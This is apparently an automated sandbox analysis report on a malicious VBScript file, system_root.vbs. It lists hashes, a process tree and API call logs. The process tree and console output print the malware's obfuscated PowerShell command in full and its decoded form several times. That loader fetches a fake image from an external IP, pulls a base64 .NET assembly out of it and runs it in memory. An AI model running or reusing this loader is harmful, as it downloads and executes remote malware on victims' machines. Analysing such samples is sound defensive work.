Summary | ZeroBOX

system_root.vbs

Generic Malware Antivirus Hide_URL PowerShell
Category Machine Started Completed
FILE s1_win7_x6403_us July 20, 2023, 12:16 p.m. July 20, 2023, 12:19 p.m.
Size 327.8KB
Type Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 ede1862a1147dbbda4c4e86db24d3b83
SHA256 51b19b4d86f7b226457efc53b1ded7e369628d258982ea3da08fad278f39b1d1
CRC32 D0452469
ssdeep 6144:/VMxzakqwJ5mn5RX5OhKNPYJTTTTTVuJz/DEDcqfHVWWTpWWHWDFdjU+ao9nrvmE:NMxzakqwJ5mn5RX5OhKNPYJTTTTTVuJT
Yara
  • Generic_Malware_Zero - Generic Malware

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\system_root.vbs

    872
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J⁂Bp⁂G0⁂YQBn⁂GU⁂VQBy⁂Gw⁂I⁂⁂9⁂C⁂⁂JwBo⁂HQ⁂d⁂Bw⁂Do⁂Lw⁂v⁂DQ⁂NQ⁂u⁂Dg⁂O⁂⁂u⁂DY⁂Ng⁂u⁂DQ⁂Mw⁂v⁂HI⁂dQBt⁂H⁂⁂ZQBf⁂HY⁂YgBz⁂C4⁂agBw⁂Gc⁂Jw⁂7⁂CQ⁂dwBl⁂GI⁂QwBs⁂Gk⁂ZQBu⁂HQ⁂I⁂⁂9⁂C⁂⁂TgBl⁂Hc⁂LQBP⁂GI⁂agBl⁂GM⁂d⁂⁂g⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂TgBl⁂HQ⁂LgBX⁂GU⁂YgBD⁂Gw⁂aQBl⁂G4⁂d⁂⁂7⁂CQ⁂aQBt⁂GE⁂ZwBl⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂⁂k⁂Hc⁂ZQBi⁂EM⁂b⁂Bp⁂GU⁂bgB0⁂C4⁂R⁂Bv⁂Hc⁂bgBs⁂G8⁂YQBk⁂EQ⁂YQB0⁂GE⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBV⁂HI⁂b⁂⁂p⁂Ds⁂J⁂Bp⁂G0⁂YQBn⁂GU⁂V⁂Bl⁂Hg⁂d⁂⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂V⁂Bl⁂Hg⁂d⁂⁂u⁂EU⁂bgBj⁂G8⁂Z⁂Bp⁂G4⁂ZwBd⁂Do⁂OgBV⁂FQ⁂Rg⁂4⁂C4⁂RwBl⁂HQ⁂UwB0⁂HI⁂aQBu⁂Gc⁂K⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBC⁂Hk⁂d⁂Bl⁂HM⁂KQ⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBT⁂FQ⁂QQBS⁂FQ⁂Pg⁂+⁂Cc⁂Ow⁂k⁂GU⁂bgBk⁂EY⁂b⁂Bh⁂Gc⁂I⁂⁂9⁂C⁂⁂Jw⁂8⁂Dw⁂QgBB⁂FM⁂RQ⁂2⁂DQ⁂XwBF⁂E4⁂R⁂⁂+⁂D4⁂Jw⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂D0⁂I⁂⁂k⁂Gk⁂bQBh⁂Gc⁂ZQBU⁂GU⁂e⁂B0⁂C4⁂SQBu⁂GQ⁂ZQB4⁂E8⁂Zg⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂KQ⁂7⁂CQ⁂ZQBu⁂GQ⁂SQBu⁂GQ⁂ZQB4⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBJ⁂G4⁂Z⁂Bl⁂Hg⁂TwBm⁂Cg⁂J⁂Bl⁂G4⁂Z⁂BG⁂Gw⁂YQBn⁂Ck⁂Ow⁂k⁂HM⁂d⁂Bh⁂HI⁂d⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂ZQ⁂g⁂D⁂⁂I⁂⁂t⁂GE⁂bgBk⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂Gc⁂d⁂⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂7⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂g⁂Cs⁂PQ⁂g⁂CQ⁂cwB0⁂GE⁂cgB0⁂EY⁂b⁂Bh⁂Gc⁂LgBM⁂GU⁂bgBn⁂HQ⁂a⁂⁂7⁂CQ⁂YgBh⁂HM⁂ZQ⁂2⁂DQ⁂T⁂Bl⁂G4⁂ZwB0⁂Gg⁂I⁂⁂9⁂C⁂⁂J⁂Bl⁂G4⁂Z⁂BJ⁂G4⁂Z⁂Bl⁂Hg⁂I⁂⁂t⁂C⁂⁂J⁂Bz⁂HQ⁂YQBy⁂HQ⁂SQBu⁂GQ⁂ZQB4⁂Ds⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂C⁂⁂PQ⁂g⁂CQ⁂aQBt⁂GE⁂ZwBl⁂FQ⁂ZQB4⁂HQ⁂LgBT⁂HU⁂YgBz⁂HQ⁂cgBp⁂G4⁂Zw⁂o⁂CQ⁂cwB0⁂GE⁂cgB0⁂Ek⁂bgBk⁂GU⁂e⁂⁂s⁂C⁂⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BM⁂GU⁂bgBn⁂HQ⁂a⁂⁂p⁂Ds⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂QwBv⁂G4⁂dgBl⁂HI⁂d⁂Bd⁂Do⁂OgBG⁂HI⁂bwBt⁂EI⁂YQBz⁂GU⁂Ng⁂0⁂FM⁂d⁂By⁂Gk⁂bgBn⁂Cg⁂J⁂Bi⁂GE⁂cwBl⁂DY⁂N⁂BD⁂G8⁂bQBt⁂GE⁂bgBk⁂Ck⁂Ow⁂k⁂Gw⁂bwBh⁂GQ⁂ZQBk⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQ⁂g⁂D0⁂I⁂Bb⁂FM⁂eQBz⁂HQ⁂ZQBt⁂C4⁂UgBl⁂GY⁂b⁂Bl⁂GM⁂d⁂Bp⁂G8⁂bg⁂u⁂EE⁂cwBz⁂GU⁂bQBi⁂Gw⁂eQBd⁂Do⁂OgBM⁂G8⁂YQBk⁂Cg⁂J⁂Bj⁂G8⁂bQBt⁂GE⁂bgBk⁂EI⁂eQB0⁂GU⁂cw⁂p⁂Ds⁂J⁂B0⁂Hk⁂c⁂Bl⁂C⁂⁂PQ⁂g⁂CQ⁂b⁂Bv⁂GE⁂Z⁂Bl⁂GQ⁂QQBz⁂HM⁂ZQBt⁂GI⁂b⁂B5⁂C4⁂RwBl⁂HQ⁂V⁂B5⁂H⁂⁂ZQ⁂o⁂Cc⁂RgBp⁂GI⁂ZQBy⁂C4⁂S⁂Bv⁂G0⁂ZQ⁂n⁂Ck⁂Ow⁂k⁂G0⁂ZQB0⁂Gg⁂bwBk⁂C⁂⁂PQ⁂g⁂CQ⁂d⁂B5⁂H⁂⁂ZQ⁂u⁂Ec⁂ZQB0⁂E0⁂ZQB0⁂Gg⁂bwBk⁂Cg⁂JwBW⁂EE⁂SQ⁂n⁂Ck⁂Ow⁂k⁂GE⁂cgBn⁂HU⁂bQBl⁂G4⁂d⁂Bz⁂C⁂⁂PQ⁂g⁂Cw⁂K⁂⁂n⁂HQ⁂e⁂B0⁂C4⁂egB6⁂Go⁂ZgBn⁂Ho⁂ZgBn⁂Go⁂egB4⁂GY⁂ZwBq⁂Gg⁂ZgBn⁂GQ⁂N⁂⁂2⁂FM⁂QQBC⁂F8⁂RgBF⁂Ec⁂XwBu⁂Gk⁂cwB1⁂G8⁂Yw⁂v⁂DQ⁂Mg⁂u⁂D⁂⁂Mg⁂x⁂C4⁂O⁂⁂3⁂DE⁂Lg⁂1⁂Dk⁂MQ⁂v⁂C8⁂OgBw⁂HQ⁂d⁂Bo⁂Cc⁂KQ⁂7⁂CQ⁂bQBl⁂HQ⁂a⁂Bv⁂GQ⁂LgBJ⁂G4⁂dgBv⁂Gs⁂ZQ⁂o⁂CQ⁂bgB1⁂Gw⁂b⁂⁂s⁂C⁂⁂J⁂Bh⁂HI⁂ZwB1⁂G0⁂ZQBu⁂HQ⁂cw⁂p⁂⁂==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('⁂','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD

      2080
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'http://45.88.66.43/rumpe_vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.zzjfgzfgjzxfgjhfgd46SAB_FEG_nisuoc/42.021.871.591//:ptth');$method.Invoke($null, $arguments)"

        2224

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
45.88.66.43 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Exception calling "DownloadData" with "1" argument(s): "Unable to connect to th
console_handle: 0x00000023
1 1 0

WriteConsoleW

buffer: e remote server"
console_handle: 0x0000002f
1 1 0

WriteConsoleW

buffer: At line:1 char:130
console_handle: 0x0000003b
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'http://45.88.66.43/rumpe_vbs.jpg';$webClient = New-Object System
console_handle: 0x00000047
1 1 0

WriteConsoleW

buffer: .Net.WebClient;$imageBytes = $webClient.DownloadData <<<< ($imageUrl);$imageTex
console_handle: 0x00000053
1 1 0

WriteConsoleW

buffer: t = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_
console_handle: 0x0000005f
1 1 0

WriteConsoleW

buffer: START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFla
console_handle: 0x0000006b
1 1 0

WriteConsoleW

buffer: g);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -g
console_handle: 0x00000077
1 1 0

WriteConsoleW

buffer: t $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $sta
console_handle: 0x00000083
1 1 0

WriteConsoleW

buffer: rtIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$comm
console_handle: 0x0000008f
1 1 0

WriteConsoleW

buffer: andBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly =
console_handle: 0x0000009b
1 1 0

WriteConsoleW

buffer: [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetT
console_handle: 0x000000a7
1 1 0

WriteConsoleW

buffer: ype('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.zzjfgzfg
console_handle: 0x000000b3
1 1 0

WriteConsoleW

buffer: jzxfgjhfgd46SAB_FEG_nisuoc/42.021.871.591//:ptth');$method.Invoke($null, $argum
console_handle: 0x000000bf
1 1 0

WriteConsoleW

buffer: ents)
console_handle: 0x000000cb
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000000d7
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000000e3
1 1 0

WriteConsoleW

buffer: Exception calling "GetString" with "1" argument(s): "Array cannot be null.
console_handle: 0x00000103
1 1 0

WriteConsoleW

buffer: Parameter name: bytes"
console_handle: 0x0000010f
1 1 0

WriteConsoleW

buffer: At line:1 char:193
console_handle: 0x0000011b
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'http://45.88.66.43/rumpe_vbs.jpg';$webClient = New-Object System
console_handle: 0x00000127
1 1 0

WriteConsoleW

buffer: .Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [S
console_handle: 0x00000133
1 1 0

WriteConsoleW

buffer: ystem.Text.Encoding]::UTF8.GetString <<<< ($imageBytes);$startFlag = '<<BASE64_
console_handle: 0x0000013f
1 1 0

WriteConsoleW

buffer: START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFla
console_handle: 0x0000014b
1 1 0

WriteConsoleW

buffer: g);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -g
console_handle: 0x00000157
1 1 0

WriteConsoleW

buffer: t $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $sta
console_handle: 0x00000163
1 1 0

WriteConsoleW

buffer: rtIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$comm
console_handle: 0x0000016f
1 1 0

WriteConsoleW

buffer: andBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly =
console_handle: 0x0000017b
1 1 0

WriteConsoleW

buffer: [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetT
console_handle: 0x00000187
1 1 0

WriteConsoleW

buffer: ype('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.zzjfgzfg
console_handle: 0x00000193
1 1 0

WriteConsoleW

buffer: jzxfgjhfgd46SAB_FEG_nisuoc/42.021.871.591//:ptth');$method.Invoke($null, $argum
console_handle: 0x0000019f
1 1 0

WriteConsoleW

buffer: ents)
console_handle: 0x000001ab
1 1 0

WriteConsoleW

buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x000001b7
1 1 0

WriteConsoleW

buffer: + FullyQualifiedErrorId : DotNetMethodException
console_handle: 0x000001c3
1 1 0

WriteConsoleW

buffer: You cannot call a method on a null-valued expression.
console_handle: 0x000001e3
1 1 0

WriteConsoleW

buffer: At line:1 char:299
console_handle: 0x000001ef
1 1 0

WriteConsoleW

buffer: + $imageUrl = 'http://45.88.66.43/rumpe_vbs.jpg';$webClient = New-Object System
console_handle: 0x000001fb
1 1 0

WriteConsoleW

buffer: .Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [S
console_handle: 0x00000207
1 1 0

WriteConsoleW

buffer: ystem.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>
console_handle: 0x00000213
1 1 0

WriteConsoleW

buffer: >';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf <<<< ($startFla
console_handle: 0x0000021f
1 1 0

WriteConsoleW

buffer: g);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -g
console_handle: 0x0000022b
1 1 0

WriteConsoleW

buffer: t $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $sta
console_handle: 0x00000237
1 1 0

WriteConsoleW

buffer: rtIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$comm
console_handle: 0x00000243
1 1 0

WriteConsoleW

buffer: andBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly =
console_handle: 0x0000024f
1 1 0

WriteConsoleW

buffer: [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetT
console_handle: 0x0000025b
1 1 0

WriteConsoleW

buffer: ype('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.zzjfgzfg
console_handle: 0x00000267
1 1 0

WriteConsoleW

buffer: jzxfgjhfgd46SAB_FEG_nisuoc/42.021.871.591//:ptth');$method.Invoke($null, $argum
console_handle: 0x00000273
1 1 0

WriteConsoleW

buffer: ents)
console_handle: 0x0000027f
1 1 0

WriteConsoleW

buffer: + CategoryInfo : InvalidOperation: (IndexOf:String) [], RuntimeEx
console_handle: 0x0000028b
1 1 0

WriteConsoleW

buffer: ception
console_handle: 0x00000297
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00479cc0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00479e00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00479e00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00479e00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00479600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00479600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00479600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00479600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00479600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00479600
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00479e00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00479e00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00479e00
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a080
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a380
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a140
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0047a1c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0069d0d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0069d210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0069d210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0069d210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0069ca10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0069ca10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0069ca10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0069ca10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0069ca10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x0069ca10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 2228224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028a0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0242a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02422000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02472000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a81000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a82000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0254a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02473000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02474000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0255b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02557000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0242b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2080
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
